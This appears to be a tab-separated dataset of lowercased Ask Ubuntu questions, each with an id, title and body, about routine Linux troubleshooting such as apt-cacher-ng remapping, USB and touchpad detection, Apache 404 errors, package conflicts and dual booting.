496285	how do remap-* statements work in apt-cacher-ng ?	i 've just started using apt-cacher-ng to cache my apt-get downloads . whenever i start it i get this error : warning : no url list file matching file : backends_gentoo found in config or support directories . looking in /etc/apt-cacher-ng/acng.conf i see these lines : # repository remapping . see manual for details . # in this example , some backends files might be generated during package # installation using information collected on the system . # examples : remap-debrep : file : deb_mirror*.gz /debian ; file : backends_debian # debian archives remap-uburep : file : ubuntu_mirrors /ubuntu ; file : backends_ubuntu # ubuntu archives remap-debvol : file : debvol_mirror*.gz /debian-volatile ; file : backends_debvol # debian volatile archives remap-cygwin : file : cygwin_mirrors /cygwin # ; file : backends_cygwin # incomplete , please create this file or specify preferred mirrors here remap-sfnet : file : sfnet_mirrors # ; file : backends_sfnet # incomplete , please create this file or specify preferred mirrors here remap-alxrep : file : archlx_mirrors /archlinux # ; file : backend_archlx # arch linux remap-fedora : file : fedora_mirrors # fedora linux remap-epel : file : epel_mirrors # fedora epel remap-slrep : file : sl_mirrors # scientific linux remap-gentoo : file : gentoo_mirrors.gz /gentoo ; file : backends_gentoo # gentoo archives i noticed that backends_debian , backends_ubuntu , and backends_debvol exist in /etc/apt-cacher/ng but backends_gentoo does not . if i create an empty file with that name then the error goes away although i 'm not sure why this is . i 've looked in the manual as the comments suggest and it looks like the lines in the conf file are specifying either merges or redirects , thought i ca n't tell which one . i ca n't seem to understand what these remap-* statements are for and if i need them or not ? also why were the other backend_* files automatically created but not the gentoo one ?
496288	how to get ubuntu to detect my usb ports	i just first used ubuntu today and have a asus q501la . i installed from a usb but after installing they do n't work . i was trying to get my lifechat headset to work then realized the red light was n't even coming on to show that it was powered so i tried multiple usbs and none of them do anything . just wondering what i should try before installing something else . i have 3 usb ports but i get lsusb bus 002 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub not sure what else to try .
496289	localhost new web site gets 404 error when other folders in /var/www are found	ubuntu 14.04 lts . i have a couple of web sites under development . here is ls -la of /var/www : lrwxrwxrwx 1 root root 10 apr 23 08:54 bpslk - > /ddr/bpslk drwxr-xr-x 2 root root 4096 jul 4 20:39 html lrwxrwxrwx 1 root root 23 jul 11 09:23 tipitaka - > /ddr/tipitaka/ ( /ddr/ is the partition containing all of my working data . ) i get a 404 not found error for http : //localhost/tipitaka but not for ... /bpslk . there are index.html files in both directories . i do n't see this behaviour in linux mint 15 , and i presume other distros . i added the symlink , then pointed the browser to /localhost/tipitaka , and it popped right up . -just installed linux mint 17 64-bit , and i get the 404 error . -just now copied entire working web site into directory into /var/www/tipitaka . all files are rw-rw-rw- , all dirs are rwxrwxrwx . still getting 404 . how do i get rid of the 404 error ? i want to work on some other local web sites , too . i need to use php , so i ca n't edit using file : ///ddr/tipitaka ... . tyvm -harry
496294	differences between restricted repositories and partner repositories ?	in /etc/apt/source.list , what are differences between restricted repositories and partner repositories ? they both do n't make their source open , do they ? are they both free of money ? difference in freedom to use , modify , and/or redistribute their software ? difference in maintenance/support level and party ?
496295	differences are between `` precise '' and `` precise-updates '' and `` precise-backports '' ?	in /etc/apt/source.list , deb http : //us.archive.ubuntu.com/ubuntu/ precise universe deb-src http : //us.archive.ubuntu.com/ubuntu/ precise universe deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates universe deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates universe deb http : //us.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse i wonder what differences are between `` precise '' and `` precise-updates '' and `` precise-backports '' i only know `` precise '' means the code name of ubuntu release 12.04 . thanks .
496296	what should i do if ubuntu is frozen at the lock screen ? ( 14.04 )	i am new to using linux , and i just built a new desktop and dual-booted it with ubuntu 14.04 and windows 8.1 . i have been using ubuntu for a few weeks , and last night i tried to create a swap file on my hard drive . i was successful , but when i rebooted my computer , ubuntu no longer works . i can log in , and am given the taskbar at the top of the screen which has the power button , calendar , and network connection etc . once i log in all i get is my desktop background with my mouse cursor . i have tried entering the terminal window with ctrl+alt+f2 and entering the commands given on this webpage : http : //itsfoss.com/fix-unity-freezes-after-login-ubuntu-14-04/ but that did not work . should i reinstall ubuntu or is there something else i can do ? thanks in advance for any help anyone can give me .
496299	java iced tea isnt working with runescape , ubuntu 14.04	java -version java version `` 1.7.0_55 '' openjdk runtime environment ( icedtea 2.4.7 ) ( 7u55-2.4.7-1ubuntu1 ) openjdk 64-bit server vm ( build 24.51-b03 , mixed mode ) this is a copy and paste from my terminal of my openjdk ... .i install the runescape game and when it loads it goes to automatically choose graphic settings ( only button to push ) i push it and the game goes black and then crashes ... any one know how to fix it ? i run ubuntu 14.04 64 bit
496306	deploy web application to local juju enviroment	i am new to juju . so far i have installed juju and configure in local ubuntu server . i have web application and i want to deploy this web app into juju server . i read more articles but they said crate juju charm and deploy . https : //juju.ubuntu.com/docs/authors-charm-writing.html i read this one . but they used vanilla to deploy . so i need to deploy my web application . can anyone tell me specific steps i need to follow . thanks sajith
496309	how to unboot my bootable usb	i recently made my pen-drive bootable with ubuntu 14.04 . but i need to unboot my pen-drive now . i formatted my pen-drive once , but the size of the pen-drive still shows 2.25 mb . whereas , this is an 8gb pen-drive . how can i get rid of this problem . anyone please help ! ( i 'm still using windows 7 )
496313	how to move an ubuntu vm from windows host to ubuntu host ?	i am running ubuntu ( 12.04 ) virtual machine ( on virtualbox ) . my host machine is windows 7 , however . i need to move ( copy ? ) my ubuntu vm in its current state into an other computer where the host machine is ubuntu . is there a solution to do this ?
496314	dell trackpad not recognized in ubuntu 14.04	thank you in advance for your assistance . i recently purchased a new laptop for use with ubuntu 14.04 ( dell inspiron i3542-8334bk ) , and am pleased to report that almost everything works out of the box . the one exception is the touchpad . ubuntu does not recognize it as a touchpad , but rather as a mouse . note that windows 7 ( default installation on my laptop ) does recognize the touchpad and has full support . curiously enough , debian wheezy also supports my touchpad ( running kernel version 3.2 ) . the largest problems with this are as follows : no scrolling the sensitivity of tap-to-click is outrageous . i normally disable tap-to-click due to general sensitivity problems in trusty but here i can barely type a sentence without the touchpad accidentally clicking somewhere i do n't want it to . the relevant output from xinput list is : virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ dll0651:00 06cb:2985 id=11 [ slave pointer ( 2 ) ] dll0651:00 06cb:2985 is , of course the touchpad . thanks ! update : the previous linux kernel version did not provide support for my touchpad . a kernel update that happened today offered full hardware support .
496315	after deliberately disconnecting , ubuntu must be rebooted to reconnect to wifi	i had to disconnect from the netgear cg3100d wifi router for maintenance work , but when i chose [ wifilogo ] > defaultaccesspoint , an authentication dialogue appeared . after typing the correct key , ubuntu 12.04 lts would not reconnect . but when i shut down and restart , ubuntu reconnects normally . why does it seem to ignore the authentication ? on windows 7 professional , reconnection occurs automatically .
496317	indicator applet keyboard shortcut	i am using gnome classic on ubuntu 12.04 and want to use a keyboard shortcut for accessing the indicator applet stuff in the upper right ( mail , wifi , sound , time , users , etc. ) . i read through a discussion forum from 2010 about creating such a shortcut , and i 've found answers here and here , but neither seems to work anymore . i was able to figure out the upper left ( `` applications '' and `` places '' ) , which is listed as `` show the activities overview '' in the keyboard shortcuts sections of the system settings , but i ca n't find out how to do the same for the material in the upper right . ( also , is there a way to set it so that it will toggle - i.e . if i have the shortcut set to the `` windows '' key , one press will access the menu , and a second will cause it to escape , the way esc does now ? ) any help is greatly appreciated .
496321	getting unmet dependencies when installing lamp-server	how to install lamp-server am using ubuntu 14.04-lts i tried to install lamp-server but the system display this error : the following packages have unmet dependencies : apache2 : conflicts : apache2.2-common but 2.2.22-6ubuntu5 is to be installed apache2-bin : conflicts : apache2.2-common but 2.2.22-6ubuntu5 is to be installed apache2-data : conflicts : apache2.2-common but 2.2.22-6ubuntu5 is to be installed apache2.2-common : depends : apache2.2-bin ( = 2.2.22-6ubuntu5 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . how can i fix this error ? i already tried these steps : apt-get update apt-get install lamp-server^ here it shows the error so i did this command : apt-get purge apache2 then i tried to re-write this command again apt-get install lamp-server^ but still the same error
496324	how do i install drivers for lexmark z1300 printer for ubuntu 13.10 ?	i bought a new lexmark z1300 printer , i could n't find any drivers for linux for this series , is there any way to install drivers and make use of this printer on ubuntu 13.10 or i have to switch back to windows to take the printouts ?
496327	how to edit lightdm.conf file	i tried to activate numlock in the login screen using numlockx . the instruction point me to add this line greeter-setup-script=/usr/bin/numlockx on to this file /etc/init/lightdm.conf i tried to reboot . in the boot screen this line was shown . error : file /etc/init/lightdm.conf : syntax invalid : init : lightdm.conf:62 : unknown stanza which means the added line . what should i do ?
496329	why is vim 's colorscheme not coloring the entire window ?	only the portions of the terminal with text on it is colored . not sure how to describe it , please see the attached screenshot .
496332	looking for an apple recognized itunes	i do a lot with my iphone and itunes . my question is simple , is there a way to get an apple recognized version of itunes for ubuntu ?
496336	bluetooth not working in hp pavilion g6-2236tx	i have ubuntu 14.04 and windows 8.1 installed . i have tried numerous ways to make it work but it always shows , `` bluetooth adapter not found '' . any help would be appreciated . it works in windows 8.1 fine . i have rt3290 bluetooth adapter .
496339	how to configure a network in ubuntu 14.04	i have 5 desktops , all running ubuntu 14.04 64 bit . all are connecting to the internet through the lan ( using a dlink switch ) , i want to see all of them in the network and sharing , and also i want to make a dedicated folder on a desktop to share files on other desktops . i installed samba and i also give permission to a folder as share with everyone , but it still is n't visible on other desktops : ( please help me in making a lan connection for sharing , internet is working fine on all pc's
496345	how to enable power failure notification ?	i need to enable power ( a/c ) failure ( off-line ) and power on ( on-line ) notifications , like this notification i searched and tried to do that but i did n't find any successful articles . i use this commands to monitor my ac adapet acpi- a echo ac_adapter= $ ( acpi -a | cut -d ' ' -f3 | cut -d- -f1 ) but i do n't know how to write notification on code can i write shell script like this . # ! /bin/bash power=ac_adapter= $ ( acpi -a | cut -d ' ' -f3 | cut -d- -f1 ) s1= '' $ power '' if [ `` $ s1 '' = `` off-line '' ] ; then notify-send -- urgency=low `` power manager '' `` power down '' -i battery_low echo `` notification : off '' > ~/.scripts/notification else if [ $ s1 = `` on-line '' ] ; then notify-send -- urgency=normal `` power manager '' `` power up '' -i battery_full fi fi
496346	permission denied error after ssh login	i am having permission denied errors after logging with non root user ( which has permissions to do `` sudo -i '' command ) . i get these errors : -bash : /bin/uname : permission denied -bash : [ : = : unary operator expected -bash : /bin/sed : permission denied -bash : /bin/ls : permission denied -bash : /bin/ps : permission denied -bash : /bin/ps : permission denied -bash : /bin/uname : permission denied -bash : /bin/ps : permission denied -bash : /bin/uname : permission denied -bash : [ : = : unary operator expected -bash : /bin/sed : permission denied -bash : /bin/ls : permission denied i do n't have root user , but user `` superuser '' with which i log-in has permission to do `` sudo -i '' command . so , after every ssh log-in i am writing `` sudo -i '' command to get root access just to get `` ls -la '' command working . i am using ubuntu 12.04 ( precise ) . this is probably related to shell permissions and similar stuff , so pointing to right direction would be awesome .
496347	why can mysql not use /run/shm as tmpdir ?	i read that using ram for mysql 's temporary tables should improve performance . i tried to create /etc/mysql/conf.d/local.cnf with the contents : [ mysqld ] tmpdir = /run/shm but restarting mysql fails , with the error log saying : 140711 11:14:49 [ warning ] using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release . please use the full name instead . 140711 11:14:49 [ note ] plugin 'federated ' is disabled . 140711 11:14:49 innodb : the innodb memory heap is disabled 140711 11:14:49 innodb : mutexes and rw_locks use gcc atomic builtins 140711 11:14:49 innodb : compressed tables use zlib 1.2.8 140711 11:14:49 innodb : using linux native aio /usr/sbin/mysqld : ca n't create/write to file '/run/shm/ibfkgz7z ' ( errcode : 13 ) 140711 11:14:49 innodb : error : unable to create temporary file ; errno : 13 140711 11:14:49 [ error ] plugin 'innodb ' init function returned error . 140711 11:14:49 [ error ] plugin 'innodb ' registration as a storage engine failed . 140711 11:14:49 [ error ] unknown/unsupported storage engine : innodb 140711 11:14:49 [ error ] aborting 140711 11:14:49 [ note ] /usr/sbin/mysqld : shutdown complete error code 13 is `` permission denied '' . but considering the following output , i do n't see what could be the problem . $ ls -ld /run /run/shm drwxr-xr-x 32 root root 1040 jul 11 09:42 /run drwxrwxrwt 3 root root 280 jul 11 09:41 /run/shm
496353	how to install ssh in ubuntu 11.10 ? getting errors while installing ssh anyone please help me	i 've run this bellow command sudo apt-get install openssh-server getting bellow errors reading package lists ... done building dependency tree reading state information ... done package openssh-server is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'openssh-server ' has no installation candidate i also tried with /etc/init.d/ssh restart got response as , bash : /etc/init.d/ssh : no such file or directory
496357	bind super key to control key ubuntu 14.04	i have installed ubuntu 14.04 . i ca n't find the option to bind super key to control key . i did the same on ubuntu 12.04 where the option is given in keyboard settings . is there a way to achieve similar thing in ubuntu 14.04 ?
496358	enable / disable auto-detect x.org needed to use kvm-switch without monitor resize trouble	i would like to be able to disable the auto-detecting of the monitor . or at least the system would ask me permission to use auto-detect . reason reason when using a kvm-switch the monitor resizes to a very limited resolution . reboot does help , but that seems to me a very primitive way to resize monitor resolution . complicated solutions there are many , more or less , complicated solutions . like change resolution when enabling/disabling external monitor a separate program . or lost the config of my monitor once i connected it to a kvm switch creating a new x.org file . respect new ubuntu architecture new ubuntu versions do not use x.org any more . i want to limit my changes to ubuntu as much as possible , to be robust for the future . it seems to me if the problem is caused by a not correct auto-detect signal when using the kvm-switch this signal should be blocked , or at least asked my permission to use it . or if i could enforce such a signal my self without reboot . that would be ok to .
496362	why my apache service does not work correctly ?	i am just a newbie using ubuntu 12.04 lts . in the beginning , i just want to install mcrypt , i followed this solution : cd /etc/php5/mods-available ln -sf ../conf.d/mcrypt.ini . php5enmod mcrypt even if run the above commands with sudo , localhost did not work normally , so i uninstalled it by running : sudo apt-get purge php5 php5-mysql mysql-server -mysql-client phpmyadmin i also followed this article , and the answers to this question . but when i installed apache2 again , this command failed to run : sudo service apache2 start . my question : how can i get back my localhost normally again ? thanks
496363	trusty - whole disc copy using sudo dd .. of=/dev/disk/by-id/xx does not write	i want to move failing hdd into spare using dd . all goes well usind if=/dev/sdc of=/dev/sdi for example , but i tried to use serial number of hdd to avoid messing the things ( well the mistake would be bad ) . command run was : sudo dd if=/dev/disk/by-id/ata-st32000542as_5xw1w057 of=/dev/disk/by-id/ata-st32000542as_5xw200f6 bs=1m but dd refuses to copy more than 4.0gb with error : dd : error writing \u2018/dev/disk/by-id/ata-st32000542as_5xw200f6\u2019 : no space left on device 3835+0 records in 3834+0 records out 4021047296 bytes ( 4,0 gb ) copied , 155,973 s , 25,8 mb/s in fact , iostat is telling me that it did not actually write anything at all . what that \u2018 prefix and suffix does mean there , and how it comes there ? did i miss something important about /disk/by-id/ , or is it a bug ?
496364	vpnc not working with mobile stick only in 14.04	i use vpnc ( the command line client from the package vpnc ) to connect with my institution . the configuration file looks like this ipsec id ciscogroup ipsec gateway xxx.xxx.xxx ipsec secret xxxxxxxx ike authmode psk nat traversal mode cisco-udp xauth username xxxxxxx the vpn connection works like a breeze if i use my wireless interface . however , if i am connected to the internet using a umts stick ( `` lidl stick '' ) , it no longer does . the umts alone is working -- i can use it to connect to the internet . the vpnc client gets started with no apparent errors , so it can approach and talk to the gateway and establish a connection . however , the moment it goes into background , i loose all connectivity . this is not a dns problem -- using ips does not help . interestingly , i can still ping one and only server -- the gateway . nothing else . is this a known problem ? is there a solution ? ubuntu 14.04
496367	.desktop file running sh script `` there was an error launching the application . ''	i have a .desktop file : [ desktop entry ] type=application terminal=true name=runme exec=run.sh when i double click the .desktop file , i get there was an error launching the application . my run.sh is : # ! /bin/sh xulrunner-sdk/bin/xulrunner-stub -- app xulrunner-sdk/bin/application.ini 2 > ~log.log double clicking on run.sh and clicking run runs the application fine . both run.sh and my .desktop are executable . what do i need to change in my desktop file to make this work ?
496368	`` unlock from launcher '' option not working	on 14.04 `` unlock from launcher '' option is not working . i have removed zeitgeist and i do not have any folder in .local/share/zeitgeist . [ edit ] it seems removing zeitgeist is the cause of the problem . i see this in the logs when i click on the unlock button : error 2014-07-11 15:05:27 unity < unknown > :0 file log.c : line 980 : unexpected error : error calling startservicebyname for org.gnome.zeitgeist.engine : gdbus.error : org.freedesktop.dbus.error.spawn.execfailed : failed to execute program /usr/bin/zeitgeist-daemon : success ( g-dbus-error-quark , 23 ) error 2014-07-11 15:05:27 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed
496371	top says iwlwifi 's pr is -51	my understanding is that the pr value is the nice +20 . so how can a process have a pr value less than 0 ? pid user pr ni virt res shr s % cpu % mem time+ command 619 root -51 0 0 0 0 s 3.6 0.0 5:37.44 [ irq/46-iwlwifi ]
496372	how to find out which package a particular file under /usr/share came from ?	how do i find out which ( apt-get-installed ) package a particular file came from ?
496374	`` ls '' freezes in the home folder	my system : lenovo t431s , 12.04 . lamp stack ( it 's used for web development ) , otherwise pretty vanilla . applications occasionally freezes when accessing the home folder . i think i saw advice suggesting a reboot when this happens , but i ca n't find that page again . take with a grain of salt , i do n't think it is related to any gui because it also happens in the terminal . in the case of being in terminal , if i `` ls '' in ~/ , it stops responding . it 's not happening now , so i ca n't remember if ctrl-c restores control . it 's intermittent : usually i have no trouble , but once the home folder becomes unavailable , it does n't come back . what i mean by that , even when opening nautilus , another terminal window , etc. , i wo n't be able to see the files in the home folder until i reboot . i realized yesterday that this problem also causes trouble with apps . i installed easytag and it always locked up . i figured out that easytag locked up because it was trying to read my home folder , and i fixed it by changing the default directory . is this a well-known problem ( it 's an old version ) with a well-known solution ? i ca n't find it . i could upgrade to 14.04 , but without seeing a discussion of the problem , i ca n't be sure it 's fixed there . i do n't want the potential hassle of an upgrade without some reasonable expectation that it fixes the problem .
496376	how to dual boot my laptop with windows 8.1 with ubuntu ?	i have some important files and software in my hp windows notebook . how can i get ubuntu to dual boot in my notebook without loosing any data ?
496378	is it possible to show a number above the icons in the task bar , referring to which desktop the application is in	i 'm trying to create separate work desktops , so i have two shells , two firefoxes , etc . what i want is to be able to look at an icon and see to which desktop it belongs . i 'm using kde and xfce . but , if you know how to do this on another desktop system , say so . if it 's not possible where would i go to ask this as a feature ?
496387	unable to setup django in production on ec2 instance running ubuntu 14.04	i have set up an ec2 instance with ubuntu and able to login via ssh . now i have installed apache , mysql ( worked fine ) . i need to install django and configure it to run smoothly with apache . i have tried doing so but unable to configure it . can you please provide me instructions for how to setup all this step by step after login into ec2 via ssh .
496390	installing few packages removed shotwell	while trying to install these packages : elementry-desktop , xubuntu-desktop & synaptic my shotwell got removed . why ? will there be any conflict if i try to install shotwell again ? please help , i really like shotwell . this is what happened : xxx @ ubuntu : ~ $ sudo apt-get install elementary-desktop & & sudo apt-get install xubuntu-desktop & & sudo apt-get install synaptic reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : apport-hooks-elementary bamfdaemon bluez-gstreamer capnet-assist contractor dmz-cursor-theme doc-base elementary-artwork elementary-default-settings elementary-icon-theme elementary-os-prerelease elementary-theme elementary-wallpapers elementaryos-report-problem-dockitem fonts-capture-it-elementary fonts-daniel-elementary fonts-elementary-core fonts-elementary-extra fonts-hvd-bodedo-elementary fonts-jenna-sue-elementary fonts-khmer-mondulkiri-elementary fonts-limelight-elementary fonts-lobster-elementary fonts-open-sans-elementary fonts-operating-instructions-elementary fonts-plainblack-elementary fonts-raleway-elementary gcalctool geary geoclue-ubuntu-geoip ginn gir1.2-appindicator3-0.1 gnome-power-manager gnome-screensaver gsettings-ubuntu-schemas gstreamer0.10-plugins-base-apps gstreamer0.10-tools gstreamer1.0-plugins-base-apps gstreamer1.0-tools gtk2-engines-murrine gtk3-engines-unico gtksourceview-3.0-theme-solarized-elementary indicator-bluetooth indicator-datetime indicator-keyboard indicator-power indicator-session indicator-sound language-selector-gnome libaccount-plugin-1.0-0 libaccount-plugin-generic-oauth libaccount-plugin-google libaccounts-qt5-1 libbamf3-2 libffmpegthumbnailer4 libgee2 liblightdm-gobject-1-0 libopenraw1 libopenrawgnome1 libplank-common libplank0 libqt5core5a libqt5dbus5 libqt5gui5 libqt5network5 libqt5opengl5 libqt5positioning5 libqt5printsupport5 libqt5qml5 libqt5quick5 libqt5sensors5 libqt5sql5 libqt5sql5-sqlite libqt5test5 libqt5webkit5 libqt5widgets5 libqt5xml5 libsignon-extension1 libsignon-plugins-common1 libsignon-qt5-1 libswitchboard-2.0-0 libtimezonemap1 libtumbler-1-0 liburl-dispatcher1 libuuid-perl libxcb-render-util0 libxcb-xkb1 libxkbcommon-x11-0 libyaml-tiny-perl light-locker light-locker-settings lightdm notify-osd notify-osd-icons onboard onboard-data p7zip-full pantheon pantheon-print plank plank-theme-pantheon plymouth-theme-elementary plymouth-theme-elementary-text print-test-page-elementary pulseaudio-module-gconf python-psutil signon-keyring-extension signon-plugin-oauth2 signon-ui signond switchboard-plug-gcc-bluetooth switchboard-plug-gcc-color switchboard-plug-gcc-date switchboard-plug-gcc-display switchboard-plug-gcc-mouse switchboard-plug-gcc-network switchboard-plug-gcc-printer switchboard-plug-gcc-sound switchboard-plug-gcc-ua switchboard-plug-gcc-users switchboard-plug-gcc-wacom switchboard-plug-power tumbler tumbler-common tumbler-plugins-extra unity-control-center unity-control-center-signon unity-greeter unity-settings-daemon xcursor-themes suggested packages : rarian-compat notify-osd-icons-elementary murrine-themes click unity-greeter-session-broadcast url-dispatcher p7zip-rar lightdm-remote-session-freerdp lightdm-remote-session-uccsconfigure remote-login-service recommended packages : pantheon-terminal noise pantheon-greeter switchboard switchboard-gnome-control-center-override switchboard-plug-about switchboard-plug-applications switchboard-plug-keyboard switchboard-plug-locale switchboard-plug-online-accounts switchboard-plug-pantheon-shell switchboard-plug-security-privacy user-specific-alternatives indicator-applet indicator-renderer audience maya-calendar midori-granite pantheon-files pantheon-photos scratch-text-editor snap-photobooth the following packages will be removed : evolution-data-server-online-accounts shotwell shotwell-common the following new packages will be installed : apport-hooks-elementary bamfdaemon bluez-gstreamer capnet-assist contractor dmz-cursor-theme doc-base elementary-artwork elementary-default-settings elementary-desktop elementary-icon-theme elementary-os-prerelease elementary-theme elementary-wallpapers elementaryos-report-problem-dockitem fonts-capture-it-elementary fonts-daniel-elementary fonts-elementary-core fonts-elementary-extra fonts-hvd-bodedo-elementary fonts-jenna-sue-elementary fonts-khmer-mondulkiri-elementary fonts-limelight-elementary fonts-lobster-elementary fonts-open-sans-elementary fonts-operating-instructions-elementary fonts-plainblack-elementary fonts-raleway-elementary gcalctool geary geoclue-ubuntu-geoip ginn gir1.2-appindicator3-0.1 gnome-power-manager gnome-screensaver gsettings-ubuntu-schemas gstreamer0.10-plugins-base-apps gstreamer0.10-tools gstreamer1.0-plugins-base-apps gstreamer1.0-tools gtk2-engines-murrine gtk3-engines-unico gtksourceview-3.0-theme-solarized-elementary indicator-bluetooth indicator-datetime indicator-keyboard indicator-power indicator-session indicator-sound language-selector-gnome libaccount-plugin-1.0-0 libaccount-plugin-generic-oauth libaccount-plugin-google libaccounts-qt5-1 libbamf3-2 libffmpegthumbnailer4 libgee2 liblightdm-gobject-1-0 libopenraw1 libopenrawgnome1 libplank-common libplank0 libqt5core5a libqt5dbus5 libqt5gui5 libqt5network5 libqt5opengl5 libqt5positioning5 libqt5printsupport5 libqt5qml5 libqt5quick5 libqt5sensors5 libqt5sql5 libqt5sql5-sqlite libqt5test5 libqt5webkit5 libqt5widgets5 libqt5xml5 libsignon-extension1 libsignon-plugins-common1 libsignon-qt5-1 libswitchboard-2.0-0 libtimezonemap1 libtumbler-1-0 liburl-dispatcher1 libuuid-perl libxcb-render-util0 libxcb-xkb1 libxkbcommon-x11-0 libyaml-tiny-perl light-locker light-locker-settings lightdm notify-osd notify-osd-icons onboard onboard-data p7zip-full pantheon pantheon-print plank plank-theme-pantheon plymouth-theme-elementary plymouth-theme-elementary-text print-test-page-elementary pulseaudio-module-gconf python-psutil signon-keyring-extension signon-plugin-oauth2 signon-ui signond switchboard-plug-gcc-bluetooth switchboard-plug-gcc-color switchboard-plug-gcc-date switchboard-plug-gcc-display switchboard-plug-gcc-mouse switchboard-plug-gcc-network switchboard-plug-gcc-printer switchboard-plug-gcc-sound switchboard-plug-gcc-ua switchboard-plug-gcc-users switchboard-plug-gcc-wacom switchboard-plug-power tumbler tumbler-common tumbler-plugins-extra unity-control-center unity-control-center-signon unity-greeter unity-settings-daemon xcursor-themes 0 upgraded , 131 newly installed , 3 to remove and 1 not upgraded . need to get 49.6 mb of archives . after this operation , 179 mb of additional disk space will be used . do you want to continue ? [ y/n ] additional details installation of synaptic package showed following error : scrollkeeper was installed , forcing re-registration of all documents . unregistering 68 doc-base files , re-registering 71 doc-base files ... error in /usr/share/doc-base/gstreamer-1.0-pwg ' , line 14 : allformat ' sections are invalid . error in /usr/share/doc-base/gstreamer-1.0-manual ' , line 11 : allformat ' sections are invalid . error in /usr/share/doc-base/gstreamer-1.0-faq ' , line 9 : allformat ' sections are invalid . note : `install-docs -- verbose -- check file_name ' may give more details about the above errors . registering documents with scrollkeeper ... elementryos is not there in the list in logon page .
496393	downloading problem at slow internet speeds	recently i had very slow download speeds at my home and it was taking 6 hours to download a file of just 250 mb with firefox browser , so is there any program that i can use to increase my download speeds ? ?
496395	ubuntu server setup : how to install ubuntu on one drive and use other drive for file storage ?	i 've built a computer to use as a home file server . i will be installing ubuntu server . i 've put a small ssd and two large hdds in it . i have no prior experience with ubuntu ( desktop or server ) . i 've watched several videos that walkthrough the server installation and setup process and i 've read lots of tutorials explaining it . i 'm confident i can get it setup and configured but i want to install the ubuntu server on the ssd and then use the two hdds for file storage , preferably in raid 1 . so how do i set it up so that the os is on the ssd and all the files are on the hdds ? all the videos/tutorials i 've watched/read have just used one drive for the os and the file storage . any helpful instructions or links would be very much appreciated .
496399	hp laptop kubuntu/win8 dual boot loader not working	i 'm very new to linux and this has been my first real experience with it aside from comp-sci classes . i 've installed lubuntu 14.04 alongside the stock windows 8 . to start , my laptop is an hp 2000 with dual core amd e300 and 4gb ram , uefi . when i first tried to install lubuntu , i could only get to grub through esc-f9-ubuntu . i played with the boot file to try and get it to work , as suggested in the below links https : //help.ubuntu.com/community/boot-repair how do i get my hp laptop to boot into grub from my new efi file ? however , when i went into bios and turned off the `` secure boot '' option , it booted into grub right away . the trouble is that when i selected the windows option , it took me right back to grub again . so i turned the secure back on and was able to restore windows and get back in . how do i fix this ? thank you ! edit : boot repair gave me this : '' an error occurred during the repair . please write on a paper the following url : http : //paste.ubuntu.com/7779731/ ''
496401	how to upgrade from xserver-xorg-lts-saucy to xserver-xorg-lts-trusty	i 'm running ubuntu 12.04 ( precise pangolin ) , and have upgraded xorg by installing xserver-xorg-lts-saucy . i 'd like to upgrade now to xserver-xorg-lts-trusty , but when i try apt-get install xserver-xorg-lts-trusty i get a whole lot of unmet dependencies : % sudo apt-get install xserver-xorg-lts-trusty reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : xserver-xorg-lts-trusty : depends : xserver-xorg-core-lts-trusty ( > = 2:1.11 ) but it is not going to be installed depends : xserver-xorg-video-all-lts-trusty but it is not going to be installed or xorg-driver-video depends : xserver-xorg-input-all-lts-trusty but it is not going to be installed or xorg-driver-input depends : xserver-xorg-input-evdev-lts-trusty but it is not going to be installed recommends : libgl1-mesa-dri-lts-trusty but it is not going to be installed recommends : libgl1-mesa-glx-lts-trusty but it is not going to be installed recommends : xserver-xorg-input-all-lts-trusty but it is not going to be installed recommends : xserver-xorg-video-all-lts-trusty but it is not going to be installed recommends : x11-xserver-utils-lts-trusty but it is not going to be installed conflicts : libgl1-mesa-glx ( > = 0~ ) conflicts : libgl1-mesa-glx : i386 ( > = 0~ ) conflicts : libglapi-mesa ( > = 0~ ) conflicts : libglapi-mesa : i386 ( > = 0~ ) e : unable to correct problems , you have held broken packages . i have used apt-mark showhold to see held packages , and there are none . additionally i have tried to use aptitude to perform the upgrade instead of apt-get , but none of the suggested methods to resolve the conflicts looked sane to me . what is the recommended way to upgrade from xserver-xorg-lts-saucy to xserver-xorg-lts-trusty ?
496403	ubuntu 14.04 realtime kernels = 3.13	i use opengl 4.4 drivers with ati drivers ( only for kernel 3.13 ) system requirements for opengl 4.4 : xorg/xserver 7.4 and above ( up to 1.15 ) linux kernel 2.6 or above ( up to 3.13 ) glibc version 2.2 or 2.3 posix shared memory ( /dev/shm ) support is required for 3d applications . and now i use 3.13.30-lowlanency kernel , and i am not found realtime kernel . give me link or source realtime kernel 3.13 thx . https : //launchpad.net/ubuntu/trusty/amd64/linux-image-3.13.0-32-lowlatency/ i am looking for real time kernel
496405	how to obtain an italian dictionary to spell-check within gnu emacs which correctly recognize accented characters ?	i am editing documents in italian with gnu emacs and i am used to spell-check my files with ispell . i have an italian dictionary already installed ( the iitalian package for ispell ) , but it does n't recognize accented characters , such as `` ă­ '' . for spanish and catalan i have castellano8 and catala8 options which recognize accented characters , and also french dictionary works fine . could anyone tell me how to obtain such an italian dictionary for ispell ?
496407	mouse and keyboard not working when i resume after suspend ubuntu 14.04	i installed ubuntu 14.04 on my dell inspiron 5537 by usb . everything worked fine , but after i resume my computer from suspend my touch-pad and my keyboard are not responding . so , i tried to reinstall all input driver but it did not work . it seems like my computer not responde.. thanks for your help .
